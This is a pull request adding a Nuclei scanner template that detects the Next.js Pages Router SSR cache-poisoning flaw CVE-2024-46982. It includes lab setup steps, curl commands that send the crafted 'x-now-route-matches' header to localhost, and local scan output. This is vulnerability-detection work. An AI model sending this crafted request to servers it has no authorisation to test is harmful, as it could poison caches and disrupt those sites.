### PR TITLE
add: template for CVE-2024-46982 (Next.js Pages SSR cache poisoning)

### DIFF
--- a/http/cves/2024/CVE-2024-46982.yaml
+++ b/http/cves/2024/CVE-2024-46982.yaml
@@ -1,0 +1,36 @@
+id: CVE-2024-46982-nextjs-pages-cache-poisoning
+
+info:
+  name: Next.js Pages SSR cache poisoning (CVE-2024-46982)
+  author: BenraouaneSoufiane
+  severity: high
+  description: >
+    Sends a crafted request to a non-dynamic SSR route in Next.js Pages Router
+    and detects an unsafe cacheable response. Affected: 13.5.1–14.2.9.
+    Not App Router; Vercel deployments unaffected.
+  reference:
+    - https://github.com/vercel/next.js/security/advisories/GHSA-gp8f-8m3g-qvj9
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-46982
+  tags: cve,nextjs,cache,poisoning,ssr
+
+http:
+  - method: GET
+    # Use a likely SSR path; in the lab we have /dashboard
+    path:
+      - "{{BaseURL}}/dashboard"
+    headers:
+      x-now-route-matches: "1"
+    max-redirects: 0
+
+    matchers-condition: and
+    matchers:
+      # 1) Evidence of mis-cache
+      - type: word
+        part: header
+        words:
+          - "Cache-Control: s-maxage=1, stale-while-revalidate"
+      # 2) Evidence you hit a Next.js page (SSR includes __NEXT_DATA__)
+      - type: word
+        part: body
+        words:
+          - "__NEXT_DATA__"


### PR DESCRIPTION

### Template / PR Information

-   Added CVE-2024-46982 (Next.js Pages Router SSR cache poisoning)
-   This template detects unsafe cache headers
    (`Cache-Control: s-maxage=1, stale-while-revalidate`) on
    **non-dynamic SSR routes** in affected Next.js versions
    (13.5.1--14.2.9).
-   Detection is based on sending a crafted request with
    `x-now-route-matches` header, which triggers mis-caching on
    vulnerable builds.
-   Not version-based: relies on behavior and response evidence
    (`__NEXT_DATA__` + cache-control header).
-   References:
    -   [GitHub
        Advisory](https://github.com/vercel/next.js/security/advisories/GHSA-gp8f-8m3g-qvj9)
    -   [NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2024-46982)
    -   [Issue
        #13204](https://github.com/projectdiscovery/nuclei-templates/issues/13204)

### Template Validation

I've validated this template locally?
 - [x] YES 
 - [ ] NO

#### Additional Details

**How to Reproduce in a Lab**

1.  Create a new Next.js app with a vulnerable version:

    ``` bash
    mkdir nextjs-cve46982-lab && cd $_
    npm init -y
    npm i next@14.2.9 react@18.2.0 react-dom@18.2.0
    ```

2.  Add an SSR page using Pages Router (`pages/dashboard.tsx`):

    ``` tsx
    import type { GetServerSideProps } from "next";

    export const getServerSideProps: GetServerSideProps = async () => {
      return { props: { time: new Date().toISOString() } };
    };

    export default function Dashboard({ time }: { time: string }) {
      return <main><h1>Dashboard</h1><p>Server time: {time}</p></main>;
    }
    ```

3.  Build and run in production:

    ``` bash
    npm run build
    npm run start
    ```

4.  Test requests:

    -   Normal:

        ``` bash
        curl -i http://127.0.0.1:3000/dashboard
        ```

    -   Crafted:

        ``` bash
        curl -i -H 'x-now-route-matches: 1' http://127.0.0.1:3000/dashboard
        ```

        On vulnerable versions (≤14.2.9), the crafted request produces:

            Cache-Control: s-maxage=1, stale-while-revalidate

        along with `__NEXT_DATA__` in the body.

**Validation Evidence**

-   Local test confirmed template correctly matches vulnerable lab
-   Re-tested with patched version (`next@14.2.10`), no match observed →
    works as intended.
-   Non-dynamic Pages SSR routes only; App Router and Vercel deployments
    are unaffected.

**Nuclei output**
 ``` bash
root@DESKTOP-6QN3GRE:~/nextjs/nuclei-templates# nuclei -t http/cves/2024/CVE-2024-46982.yaml -u http://localhost:3000/ -debug -irr

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.8 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 114
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2024-46982-nextjs-pages-cache-poisoning] Dumped HTTP request for http://localhost:3000/dashboard

GET /dashboard HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
x-now-route-matches: 1
Accept-Encoding: gzip

[DBG] [CVE-2024-46982-nextjs-pages-cache-poisoning] Dumped HTTP response http://localhost:3000/dashboard

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Cache-Control: s-maxage=1, stale-while-revalidate
Content-Type: text/html; charset=utf-8
Date: Thu, 11 Sep 2025 05:33:06 GMT
Etag: "wlqeup46kl110"
Vary: Accept-Encoding
X-Nextjs-Cache: STALE
X-Powered-By: Next.js

<!DOCTYPE html><html><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width"/><meta name="next-head-count" content="2"/><noscript data-n-css=""></noscript><script defer="" nomodule="" src="/_next/static/chunks/polyfills-78c92fac7aa8fdd8.js"></script><script src="/_next/static/chunks/webpack-4e7214a60fad8e88.js" defer=""></script><script src="/_next/static/chunks/framework-49c6cecf1f6d5795.js" defer=""></script><script src="/_next/static/chunks/main-cfe4355ac121962e.js" defer=""></script><script src="/_next/static/chunks/pages/_app-753213cf38d40131.js" defer=""></script><script src="/_next/static/chunks/pages/dashboard-87c7a0c58d4ed004.js" defer=""></script><script src="/_next/static/LL9AyDDSV5q8LcakByGrF/_buildManifest.js" defer=""></script><script src="/_next/static/LL9AyDDSV5q8LcakByGrF/_ssgManifest.js" defer=""></script></head><body><div id="__next"><main style="font-family:sans-serif;padding:24px"><h1>Dashboard (SSR)</h1><p>Server time: <!-- -->2025-09-11T05:14:48.246Z</p></main></div><script id="__NEXT_DATA__" type="application/json">{"props":{"pageProps":{"time":"2025-09-11T05:14:48.246Z","echo":null},"__N_SSP":true},"page":"/dashboard","query":{},"buildId":"LL9AyDDSV5q8LcakByGrF","isFallback":false,"isExperimentalCompile":false,"gssp":true,"scriptLoader":[]}</script></body></html>
[CVE-2024-46982-nextjs-pages-cache-poisoning:word-1] [http] [high] http://localhost:3000/dashboard
[CVE-2024-46982-nextjs-pages-cache-poisoning:word-2] [http] [high] http://localhost:3000/dashboard
[INF] Scan completed in 5.416728ms. 2 matches found.
root@DESKTOP-6QN3GRE:~/nextjs/nuclei-templates# 
 ``` 
**Screenshots**
<img width="1920" height="1080" alt="image" src="https://github.com/user-attachments/assets/ad40c176-7ac9-49ab-83fc-5f83ce1dc400" />
<img width="1920" height="1080" alt="image" src="https://github.com/user-attachments/assets/2eef45ca-ba81-4bb1-a8d4-4438f83df905" />
<img width="1920" height="1080" alt="image" src="https://github.com/user-attachments/assets/9919d7d4-ca58-4bf6-b3ef-12907df6f861" />


### Additional References

-   [Nuclei Template Creation
    Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
-   [Nuclei Template Matcher
    Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
-   [Nuclei Template Contribution
    Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
-   [PD-Community Discord server](https://discord.gg/projectdiscovery)

------------------------------------------------------------------------

/claim #13204
